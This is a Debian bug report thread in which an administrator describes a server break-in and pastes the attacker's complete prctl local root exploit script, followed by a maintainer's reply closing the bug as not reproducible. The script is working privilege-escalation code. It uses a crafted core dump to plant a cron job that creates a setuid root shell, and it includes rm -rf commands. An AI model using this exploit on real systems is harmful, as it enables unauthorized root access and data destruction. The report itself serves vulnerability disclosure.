Bug#458251: marked as done (prctl exploit works on kernel 2.6.18.5)
Your message dated Tue, 20 May 2008 18:14:30 +0200
with message-id <20080520161430.GT13383@stro.at>
and subject line Re: prctl exploit works on kernel 2.6.18.5
has caused the Debian Bug report #458251,
regarding prctl exploit works on kernel 2.6.18.5
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)
--
458251: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=458251
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
Package: linux-image
Version: 2.6.18.5
Tags: security
Hello.
I'm running debian etch server. kernel 2.6.18.5, libc6_2.3.6.ds1-13etch2
updated by aptitude yesterday.
Today my server was attacked. Attacker logged in as non privileged
user "test".(password was brutforced). He used prctl local root exploit
(code below).
And it works! file "core" was dumped at folder /etc/cron.d/
The only happiness is that cron did not run it. Error in syslog:
cron[2379]: Error: bad minute; while reading /etc/cron.d/core
I tried to find out this exploit at google and find that it was affected to
kernels 2.6.13-2.6.17.4. from kernel 2.6.17.4 it should be fixed. But looks
like not....
Please let me know if you need resulted "core" file. I have isolated copy of
all files created by attacker.
Below is attacker script source:
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
* * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ;
rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh
--
Regards, Lex
--- End Message ---
--- Begin Message ---
- To: 458251-done@bugs.debian.org
- Subject: Re: prctl exploit works on kernel 2.6.18.5
- From: maximilian attems <max@stro.at>
- Date: Tue, 20 May 2008 18:14:30 +0200
- Message-id: <20080520161430.GT13383@stro.at>
Version: 2.6.18.dfsg.1-17
no evidence was brought forward that etch kernel is vulnerable.
tests so that it isn't, thus closing.
--
maks
--- End Message ---
Reply to: